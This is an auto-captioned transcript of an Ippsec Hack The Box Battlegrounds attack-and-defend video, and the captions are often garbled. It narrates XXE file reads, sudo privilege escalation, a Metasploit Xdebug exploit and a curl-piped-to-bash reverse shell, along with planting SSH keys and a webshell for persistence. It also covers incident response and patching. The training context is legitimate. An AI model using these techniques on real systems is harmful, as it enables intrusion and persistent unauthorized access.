Hack The Box Hacking Battlegrounds - Cyber Mayhem Gameplay with Ippsec

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
what's going on youtube this is ipsec and thanks to hack the box for introducing battlegrounds we not only get a chance to do some live hacking but also is the response of other people hacking us in real time trying to figure out how they get onto a box and then patching the vulnerability to hopefully prevent them from getting back on at a later time but before we do anything there are three quick things i want to go over first as of recording this video this mode is only available to vip and vip plus members that's not to say it's always going to stay that way but right now it requires a subscription that's either 10 pounds or 13 us dollars per month which actually is a steal when you consider it also gives you access to over 150 retired machines and walk throughs and also the pound box which is a parrot vm in the cloud they can access via your browser so i would highly recommend getting vip if you are not already one secondly the platform is treated like active boxes please do not stream or post videos of these boxes until hack the box provides for the guidance i know a lot of people would benefit highly from watching these type of videos but the game may not be fun after all the videos and walkthroughs of the machine go out because people would start going and having like auto patching scripts which just absolutely kills this game mode i know hack the box wants to allow streaming and hopefully that comes soon but as of right now please do not stream any machine i know there's gonna be machines shown in this video but it's coming from hack the box on hack the box's youtube channel not my youtube channel lastly this feature is currently in beta new features and machines are still being added pretty frequently so the platform you see in this video may not line up exactly with what you see on the page so with all that being said let's get started to access the battlegrounds just go to the hack the box website and then on the left side there's going to be this battlegrounds link click it and then click play this view brings you to the dashboard where you can see all the various game modes right now only cyber mayhem is available which is a four versus four attack and defend game that takes one hour to play so i'm going to click on play battleground select the match type i want which again only cyber mayhem is available so i'll click find match and then while we wait we can check out the how to play which is going to have frequently asked questions on the right like do you need to form a team the answer is no you do not you can play by yourself or be joined by two or three other friends if you go by yourself it will just auto match you with people until it gets to four versus four the game won't start until there's eight people in the queue and there's also some rules down the middle here such as please don't shut down machines uh also do not change the root password every machine gets a unique root password um there are health checks to make sure people are playing fairly so those health checks begin with hdb equals one in the process please do not kill those processes and also please don't use those that like um hdb equals one in your own attack stuff and try to fool people into thinking that's a health check script because that's just unfair speaking of unfair do not create a script that just randomly goes out and kills reverse shells anyone can do that the trick is to actually learn how to patch things because that's gonna make you a better blue teamer and if you're a better blue teamer you're also gonna be a better red teamer number one you'll know how to um get around certain patches and number two if you put better mitigations in your report it's gonna make it feel like it just isn't copy and paste from nessus or something it's gonna make your approach so much better if instead of like um don't let me do a reverse shell you say hey if you did php in safe mode it may have blocked my reverse shell first sent you alert and then you would have had time to respond to me before i just pound your whole environment so definitely always learn how to patch things because knowing blue helps tremendously i came from a blue background and i think it's probably what makes me such a strong attacker um defenders also aren't supposed to kill an entire service instead try to patch the vulnerability so what that means is if you see a vulnerable website don't just go and kill apache instead go through the source code and try to put the patch in so maybe you'll go through like a php app see it's using eval and switch that to like a file get contents so there's a bunch of other rules definitely go read them while you're in the queue but more so while we wait i'm going to go through my general workflow so as you know i'm a huge tmux fan so i have a few panes here we have a server a blue a metasploit and an attack pane and by the end of the event everyone's chaos so it's probably gonna get up to through like 10 up here um my server tab number one i do this one for my vpn uh so um when battleground starts everyone gets a unique vpn file so that's what this tab is for then right below it i put my pane that's gonna have a web server i don't have that launched right now because every battlegrounds i create a new dub dub dub directory to try to stay somewhat clean and that's based off this www skele directory so if i go in here we can see i have a few files whoops i have my public key then linps then this php dash rev which is just launch script that's hard coded to have this ip address that will be changed where we generate a new directory so if you don't have london script it's probably in user share lotternum php php reverse shell.php i remove these comments so ip's near the top because it just makes it a bit more quicker to make sure everything's working and then the final script i have in here is setup.sh and this is just what i run once i root to box it's going to make sure the ssh directory exists and then put my public key into the authorized key file and also drop a cute little webshell inverw html in case they try to get me off and don't do proper cleanup so this directory is used with a script i created which is called um let's see start bg and what this does it's going to copy dub dub dub scale to just dub dub dub that's going to run said to replace the ip address with the ip address i specify and it's copying laudanum shell to a few different files that i have found be helpful this these three are just different attack vectors i didn't want to remember exactly how many characters i need for this one to generate every time so i just copy the file so i always have it ready to go this is a wordpress one obviously this is just one if i want to be cute again it's all phprev.php and then i have a one-liner so this is just going to put the bash command inside of shell.sh and then we have this one that's going to put a base64 version in case i have to get around bad characters or something [Music] so that is the bg script i always have a blue pain and what this is is it's just a way to quickly access my castle so i have hpg.sh and this is using ssh pass to get into a box um the second argument's gonna be password and then we got these dash o's this is going to eliminate the ssh host key file because all the castles get generated every game so you can have a lot of ips use or get reused which is going to make your ssh life hell if you don't add these dash o's so to use this i just do like dot slash hbg the ip address and then like a password and this sshs me into the castle um the last script i have is a get flags this is going to go through every castle that i have an ssh key on and print out the flag so if they haven't cleaned me up this just makes it really quick to re-get the flags whenever they rotate so batch mode is going to say only do as sage public key files never accept a password if i don't have that then when i run the script and i come across the castle that my host key's not there the script's going to pause and ask me for a password so this gets rid of that then of course you got the disabling host keys and then it's using my private key and here's the command root at 10 10 10 110 and then the ip address and it's going to cat root dot flag or yeah root flag text put a line break then cat opt flag.text and put a line break so that's super simple um there is a meta split tab and all i do here is do a pseudo msfdb run and i know a lot of people don't like metasploit but keep in mind this is a timed event so anytime you waste trying to get a github page or something working you're wasting time getting a flag and you may waste that time during a flag rotate and miss out for points on that round so always do things as efficient as quick as possible metasploit is that additionally metasploit may help you hide a bit better from a defender because it won't look you probably won't have this like python 3-c import pty process being spawned if you're using metasploit which a defender may see there is also the attack this is just where i will do all my reverse shells from the beginning again i create like five panes after this because it just gets such such a mess so um that's about it i guess there's one more thing i do if you do use firefox and the same pain you're gonna be attacking from um i'd highly recommend going into burp suite going into the proxy the options and then under intercept client request click on add and say um ip address is in range of 10 10 10 110 100 10 10 110 100 to 120. and then also disabling the websockets and burp suite because i don't think any boxes right now utilize websockets but this website does and what we're doing here is making sure when we refresh this page or up um uh or submit flags or burp suite doesn't intercept it because it's gonna slow you down so much if you have this page in the background constantly sending requests going into your grip suite stopping you from intercepting something to like 10 10 110 101 so we can try this let's see 10 10 110 let's try one or two uh ctrl shift r because this is just in my cache right now uh we have to go actually to burp suite send this in and we can see now this page is being intercepted let's go drop this request go back to hack the box ctrl shift r and we don't see hack the box being intercepted so this is good since we are still waiting for a match what we can do is i guess kind of go over some things i do once i get on boxer go over this um setup so i'm going to do start battleground 127.001 to get started and then we can go into www directory and if i do a less on shell.sh you can see the ip address was magically changed to 127.001 if we look at the please subscribe you can see that ip address was also changed so let's say i get on a box or i find a command injection vulnerability what is the first thing i'm going to do well i'm going to say hey um run the command curl 127.001 of course this is gonna be like a 10 10 14 on shell.sh and pipe it over to bash and what that's going to do is send me a reverse shell and then from here of course i'm going to do python 3 dash c import pty then pty dot spawn bin bash and then i may go into a different directory do some hacky things like go into please subscribe and start doing things at this point the defender may catch on and one good thing i've always found running is uh p s a e f uh dash dash forest this command's gonna feel like magic because it's going to print everything in a super nice tree so you can trace one attack who did um i'm launching this from bash if this was a box this would probably be like apache 2 some thread and then you'd see it but the really cool thing about this is you can go to the pid the proc directories of these processes so if we go into uh whoops cd slash proc slash this you get a bunch of files the main key one being cwd.txt so if we do ls la grep for cwd we can see where this shell is dev shm please subscribe you could also go into like file descriptors and cat these to see what they're seeing or you can send them a message if we echo um please subscribe to ipsec to zero let's see what happens here i'm guessing it's going to appear right here boom so we sent this pane a message um the other really cool thing about this though from a defender we may not want to kill his shell yet we may want to kind of see what he's doing or how he got on the box a lot of these boxes have multiple paths like it may have an apache server may have a tomcat server may have an ssh key may have smb there's a bunch of different ways to get on these boxes so right here's where they launched python and they went into a different bash but right here is the bash that was set off by their reverse shell so while um lsla proc five seven nine seven three oh grep for cwd well this one says they're in dev shm please subscribe this one's probably going to say something different so if we do lsla proc this grab cwd this is saying home ipsec hdbg which is the directory we were in when we launched this command so this can kind of give you a hint of what application i'll look at to figure out how they got on the box if it's in apache of course go to like access logs look at their ip address so what i would do is do a ssanp and grep for that pid and hopefully i find it and can see what i p address they are so i can go into the apache log file and see the last thing they accessed so um yeah i hope that becomes helpful i'm gonna wait for an actual queue and then we'll get in do one box and hopefully do instant response of one box so let's close this out [Music] and then uh go up one directory rmrf www and now let's just wait in this queue [Music] so when you get this match found click accept and we have eight of eight people accepted so the game should begin very shortly click on the get uh okay for the get ready and then we can see who's playing so we got dire gt myself or for jay and felimos versus sinfuls tobu egotistical and marine so let's just click on the download ovpn and then i'm going to open this and we're going to copy this into a profile so v bg.com i'm going to delete everything here because this is an old um battleground vpn that i don't need and restart it so openvpn bg.com and since we're here we know i pasted it correctly there's not an error message um i just like starting it because if there is like if i put an extra character or something i don't copy everything it's gonna tell me i thought it would tell me my um file is bad but get it started it's not gonna connect right away you have to wait for the eight bars to go green so that's down here once all eight of these go green then the vpn will turn on and you'll be brought to a place to access the castles so i'm just going to wait here for these bars to go green and then we'll reconnect so all the burrows are green i'm going to go back to my vpn and we're going to reconnect and hopefully we get the 10 10 14 2 address because i feel that's just home field advantage and we do not we have 10 10 14 5 so what i'm going to do is start bg 10 10 14 5 and that's going to build that dub dub dub directory with everything i want so let's go take a look at the new pane we have four machines for each team again these are the same machines per team the idea being one is for you to log into and defend the other for you to attack whenever i go to a page i also hit ctrl shift r to force a cache refresh because this may show you something from the last game so just do ctrl shift r every time and we get different portals come on which one is this looks like secure file manager and then what is this um something that says method not allowed so i'm gonna go look at here because this brings me right to a login form and i'm used to lacking login forms so i'm going to click here and do assign to me to tell the team i am working on this box and then we can also retrieve the root password now it just copied it to my clipboard and oh man someone's already prone that so let's go dot slash hbg.sh 1010 110 and this one is 102 for us to log in and defend paste that and we get logged right in so let's go intercept this login request so my brip suite is on going over to firefox and going to this box i'm going to try to log in with ipsec root ipsec.rocks and the contact will be fives three fives and four fives hopefully i did that correct and we're going to intercept this request go over to burp suite and we see something weird with this login request um can't send temporary password to me but this is xml so we can do some type of xml any injection most likely um so i'm going to say uh oh man rip's in pretty print sweet so i'm gonna do doctype root and then entity test system and i'm just going to access etsy passwd first to see if this is vulnerable i think i did that correct so name ipsec and for the email since it's outputting the email here this is where i'm going to put the test and we can see this one line let us do that xml any injection and we have a list of all the users on this box one of which being olivia so the first thing i'm going to do since this is the only user i'm going to try accessing home.olivia.ssh olivia slash.ssh id rsa to see if she has a key which she does so let's log in as olivia and see what we have so i'm going to go over to number three and we'll do v olivia paste the key chmod 600 on the key sh i olivia 10 10 110 us are them a 106. uh this is what i mean about having all those dash o options so we have to paste this thing to erase the uh key from us log in and i forgot to put olivia at and we are in i'm going to run w to see if there's any defenders on this box i don't see any logins from roots so we should be good studio-l and it wants us to have a password for olivia so we can try seeing if we can find any passwords so i'm going to go to like ver www.html and see if i find any like db.coms there is this process.php and this looks like it's going to be something for um where we sent our login request so if we go back to our group we did process.php there's this line xml disable entity loader i'm guessing if we change this to true it's going to fix the issue so we may want to go over to a blue castle real quick verb dub dub dub html go into process.php and change this one line to be true so hopefully it's not vulnerable we can test it once we um get a shell or i guess we could go back to burp and say uh 102 send it couldn't send temporary password we can change that back to be false save and we get a password so now we know we have patched the way we just got onto the box as we're going along so going back to this attack pane let's see let's go into blog and there is a config.php if i look at blog here would this have been a website looks like maybe oh we probably have to disable burp suite let's go to slash blog and it was a website so this may also be vulnerable um there is a password here for olivia and i could also go and grab flag.text but i don't do that right away because the person may come in and kick me off we can do a w to see if anyone's logged in and we're gonna run this in a few seconds after i submit this to see if egotistical comes and logs in to kick me off so i'm gonna paste this here we'll see what he does if anyone logs in and we're gonna try using this for my password so sudo l paste this and it looks like olivia may run a few commands get volt and says ctl sys ctl i think has a gtfo bin so i'm going to check that out so gtfo bin i'm going to do cis ctl um if you're not familiar with that i guess i can show not just doing going the directory directly so let's just do gtfo bins uh dot io and then says ctl click on sudo and it looks like l file equals file to read and then sudo sys ctl and then the file so i'm just gonna grab this paste and we'll do um root.ssh id underscore rsa to see if the keys here looks like it is so i'm going to grab this key and then go to a different pane um this box is called atobart so adel brt i'm gonna paste this chmod 600 on this flag sh-i to this at 10 10 110 106 i think is the ip address and we have to specify root and we are on the box so now i can do curl 10 10 14 uh my ip is dot 5 setup.sh type it over to bash and i never started my web server so shame on me sudo python3 dash c m http.server 80. and then run this again and now if i just ssh i ipsec root at 10 10 110 106 it's gonna log me in if i run my get flags it's gonna go through each box and this one i can log in let's do a w on this box to see if any defenders logged in one did he did not kick me off though we could oh no that's me never mind that's not a defender that is me ignore so let's go take a look at um our box to see if we can figure out how this person got on so we patched the vulnerability we got in with um looks like they have a different way to get in so what i'm going to do is that p s e a f dash tree is it tree what was it dash forest uh p s dash eaf dash dash forest and i don't see any reverse shells so they probably just did something to grab the flag so it's probably like an lfi to grab op flag.text maybe they did the xml any injection we're sitting on it so um what we can do is cd ver log access uh apache2 and then grepford101014 on access log and i am one ip address what am i i am dot five so i'm going to ignore anything with dot five it looks like we have two people here someone was doing the process seven so that's probably a malicious person um they're trying that xml any injection but thankfully i patched it as i was going along and they can't get in so whoever.5.7 is they are probably frustrated well maybe not dot five because that is me so whoever.7 is they're not having a great day um let's see flag so no one's trying to get the flag um let's see let's try to go to 1010 110 101 and see if anyone has a shell so retrieve root password and i'm going to hbg 1010 110 101 paste it and i'm going to do the pseaf dash dash forest and do we see anything nothing looks out of the ordinary so again um we don't have anyone having a shell on our equipment yet so we can try ver um log apache 2 cat access log grep 4 10 10 14. and a bunch of post requests to just slash from 10 10 14 2. so flag so maybe there's something in a post request for this we could probably tcp them do we have tcp dump yeah we could tcp dump and see exactly what they are doing but i'm going to go and log into the other boxes see if anyone has over a shell and didn't submit anything so let's go to hbg 1010 110 103 paste ps eaf forest and let's see stuart jboss doesn't look like anything suspicious let's try the last one ps eaf we have to get into the box first so retrieve root password ps eaf get into the box first getting ahead of myself paste this password in ps eaf dash dash forest and doesn't look like we see anything um we see someone editing index.php that is one of our defenders the issue with this though um he's using vi and verb dub dub dub html if we do lsla oh i thought it was going to create a swap file is that still being edited let's see ps eaf it is not but when you do vi it's going to create a file.swp and that may allow someone to see the source code of the file so if you're accessing like db.php or something definitely be careful with that because if they access your swap file then um yeah bad things will happen so i guess we should just wait for someone to get a shell p s dash eaf dash dash forest doesn't look like anything here p s e a f dash dash forest nothing here oh wait we have a shell uh we have a python reverse shell some uh from olivia here so yep this is legit so let's go see what they're doing so if we go to cd slash proc 3609 lsla on grep cwd they're currently in the blog so chances are this is what they exploited or they're grabbing the file for the password so we may see them pseudo very shortly uh we can see where they landed on by this one so let's do um cd proc 3509 lsla grep cwd uh looks like yeah it's the blog beforehand too so i'm guessing they somehow exploited this blog um was that forest command what i'm going to do is i think this one will have the ip address so ssanp grep43437 and we can see this is 10 10 14 8 has a shell on port 4444 so what i'm going to do is go to var log um apache 2 and we can grep for this ip on access log and we can see what they hit so they did nothing really get on slash js imagetest.jpg um let's see do they upload that test.jpg somehow so www.html cd image file test.jpg looks like a jpeg uh install image magic so that's not how they got on um we can do a ss-lnpt to look at all the open ports and see what there is so we have apache on 80 my sequel on 3306 my sequel i honestly do not know they are the olivia user so they didn't sshn ps eaf dash dash forest are they still in they are so let's see grep olivia ps ef maybe i misspelled olivia see olivia is running apache so ss lnp t and yeah grep on 33.98 so i want to see what port this apache is make sure it is port 80. um let's see maybe 2643 the parent process so here we go it is listing on port 80 so they got in over port 80. they had a command execution somehow and i didn't see them in ver log all right yeah log apache 2. so let's see sometimes being defender is heard so um grab this on access logs and let's see get slash has owned process.php user flag login html oh maybe they did something was this a 404 getting slash admin oh wait this is 101 right i have what box am i even on this is 102. so this is this one not exactly sure how he got on but let's see doesn't have a root session what we can do is e ps f dash dash uh forest and we're going to kill his session and run tcp dump so i'm going to kill three four three seven round three availability that's no longer there so we can go to slash root uh tcp dom let's do ifconfig tcp dom i ens160 dash p uh we can just say let's let's not do port 80 let's just whoops no i need to specify an out file crap um pkill tcp dom make sure he's not on the box before you do this doesn't look like he is uh dash n and maybe port not 22. does that work the enemy has owned a user flag oh crap we just missed it um eaf forest it's defunct kill dash nine let's do three three nine eight that may kill something i don't want to hopefully get the show yet let's try dash o forgot the out file um tcp dump dot cap and i think s zero so we capture everything i forget the size oh well we won't what that's w for out file or write file s0 so hopefully we capture them if we see the root flag i'm going to download this capture and we will analyze it and if someone else logs in i will go and take a look at exactly what happened so i'm going to pause the video and just sit here until we see something or actually we can retrieve root password and slash hbg 1010 110 102 paste this up what see grab retrieve root looks like someone may have changed this password oh i added an h to it somehow okay um both of those are me ps ef uh i think eaf dash dash forest and we see my tcp dump but we do not see any shells yet oh no here's one as olivia that could be the shell they already had let's see kill dash 9 3608 and 3609 so i think they had a shell already on the box so i don't think i did a good job at getting them off so always be careful how you kill and always always double triple check so let's go here restart this capture tcp dump 2.cap waiting for a shell and we can also go in dot ssh cat authorize keys and i don't think this is we'll do an lsla october 20th at 1109 what is the date 11 33 so like 20 minutes ago i don't think it's been that long so let's do another ps command and we don't see anything so i'm just gonna sit here and wait for another flag and we'll go to the box and do an instant response because i want to show a clean instant response of us doing something so someone got a user on this box so let's go take a look at it i'm going to retrieve the root password uh we already got a session i think it's this one if config is this 103 that's 104 if config 103 ps eaf dash dash forest and we see up here someone got on through jboss uh because we see this bash over shell as leo so we know to look into jboss to see exactly what they did um this is going to be a tough one to patch probably because i don't know java that well but we can try going into cd opt jboss um cd server find dot maybe grep for jsp so i'm actually not sure how to patch this one that i'd be comfortable doing it live or hunting for the vulnerability so this shell congratulations you get to keep it um if i was doing this and not recording i'd be digging into this a lot more but you can definitely see how this pseaf force command helps you find reverse shells um while we're here is anything here yet i don't see a rochelle on this one is there anything here nothing there and nothing there um we can see if they cleaned us up i'm gonna run the git flags again if they haven't i will just submit these two flags right away and then we're going to sit and wait for um them to pop something because i really want to show a good instant response thing so flag's reset and someone got a flag on 101 right away so we're gonna go take a look at that box to see if we can figure out exactly how they got that user flag so i think it's this if config 101 if we go to ver log cd apache 2 and probably just tail dash 10 on access log and see what files are accessed they're still doing this post request to slash so let's go ver log dub dub dub cd ver www.html and look at index.php because they're doing a post request here so they have some type of lfi so we have this post and url and let's see where is url used uh let's see first url equals nothing out so what i'm guessing this is is um this url is beginning with file and they're grabbing something so let's go to 1010 110 101 and we can see what this app is um they're probably doing like file colon slash opt flag.text and that's how they're grabbing it so they don't have a way to get a reverse shell they can just include files off the server so let's go and patch that vulnerability real quick to make sure they don't get that flag again oh wait ocd her squirrel oh it's this one again that's tomcat i don't know how to troubleshoot that one but let's see we can probably change this to say um if flag is in url then die so let's go and see php code if string is in variable see string contains a specific word awesome so here we go let's have some fun um let's grab this and for each list as url um post url equals that was it doing this so file get contents so here let's change this to be is there a url variable there is post url let's say ipsec is equal to post url like this and then do this say url and have flag and echo not today also subscribe to ipsec and die and then save this and let's go back here and try this again oh we forgot to change this flag to be ipsec so this url should also be ipsec sorry it's hard to do this and talk at the same time but change this over to ipsec and print and we got that one patched so if that is like http it probably will say fail to connect url so that is good it's a file get content so if that was an eval i would stop http as well but we have stopped whoever that was from accessing that flag if we wanted to add some jazz we could go to battle log and look at florida and see who took florida so let's see um albert so this is ego taking that one where is florida team two [Music] so instead of this i'm going to put not today and that is good so albert someone got this flag so let's take a look at exactly what happened hopefully we have it in a tcp dump and oh my god someone did someone kill my connection uh let's do uh let's see scp 1010 110 102. uh what was it what do we call it i'm going to call do du and we will copy it to period we'll probably have to get rid of this host key yes 102 put this back in and we have to say root tcpdump2.cap is bringing in so we can do wireshark tcpdump2.cap and hopefully we see how they got in [Music] your team so let's see get blog do they have a show on this box availability check initiated ps eaf dash dash forest um i do see a shell so let's see let's cat slash opt flag.text and we're going to search our pcap for this string so if we go here we can buy ctrl f uh search this string narrow and wide packet bytes will this find i thought this would work um yeah i guess that won't work back at details nope so what we probably have to do is pipe this over to something like um us not bro zeke zeke would be super helpful here um we can look at what port they're using i think it was probably four four four four so bs eaf dash dash forest um let's go here and uh ss a and b grip they are connecting on 10 10 14 8 put 9000 and then 444 so let's try tcp.port is equal to nine thousand uh four four four four i wonder if i'm in like the wrong capture or maybe it just didn't capture it see we're in tcp dump two let's take a look at vera log apache 2 again and we're going to look at this for 10 10 14 8 so grep 10 10 14 8 on access dot log and it doesn't look like anything else was hit tail dash f access dot log and let's go to 10 10 10 102. i think i'm missing a piece to this puzzle so swindle shows um let's see slash blog was it blog shows flags have been replanted let's see i'm going to look over at the blog and let's look at this request send this i want to send this over to burp suite senator peter go and okay it's got x debug running so i was thinking this because just ways to pop a web server that will default to port four four four four and that is a metasploit port so whenever i see four four four four i think of metasploit and what probably happened is they use this exploit so the enemy has already used 0 and we can do show options set our host to ton zero uh set path slash blog slash index.php and the default servport is also 9000 which is going to be good for us so uh set lhost to ton zero set our host to 10 10 110 102 run and we can get on the box so we have finally figured out what ego's been doing i think so eaf dash dash forest let's see how i did it what mine looks like see i don't see where meterpreter is here again meterpreter is going to hide much much better than python stuff could be this right now so it may have not loaded the second stage yet um let's see ps let's go to dev shm and go over back to a blue or go back to our server i mean yeah blue blue's what i want um let's look at this one so if this olivia process is in devas hm this is meterpreter this is python so let's see um lsla slash proc slash 26 grep dash i um cwd nope oh three one four nine i misclicked so three one four nine yep this is my interpreter right here so you can see it's definitely a bit stealthier if we went into shell this will probably be a lit a bit less stealthy so we can do this and then you can see here materpter and materpt are launching a shell so again always know your tools and kind of what they do but let's go and patch this x debug thing so let's go i think it's v etsy php php.ini um cd etsy find.grep.php.ini so v php 7.0 apache 2 php.ini and is there a remote host remote host is 127.001 let's just try disabling x debug so service apache 2 restart so xdebug is enabled and what we can do now is kill his shell so pseaf dash dash forest and grab python uh i think he's off the box cd slash root ssh cat authorized keys i don't think anyone's changed this let's look at the date 1109 still psef dash dash forest um make sure i'm on the box 102 so i think ego left this box so hopefully we have kicked them off maybe when we restored it apache um it killed him we can check that out by going to interpreter material session one died so yes that worked trying to go run and it can't run anymore so looks like we have patched x debug and the next time a health check comes if we don't see losing points here we didn't interfere with the checker script and everything is good um i don't know how this one got owned what is a battle chat saying uh asking why flag is reset so yep that'll be the video hope you guys found this insightful take care and i will see you all next time
Info
Channel: Hack The Box
Views: 95,233
Rating: 4.9600921 out of 5
Keywords: gaming, hacking, cyber security, cybersecurity, cyber mayhem, attack defense, battlegrounds, hacking games
Id: o42dgCOBkRk
Channel Id: undefined
Length: 56min 33sec (3393 seconds)
Published: Thu Oct 22 2020
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.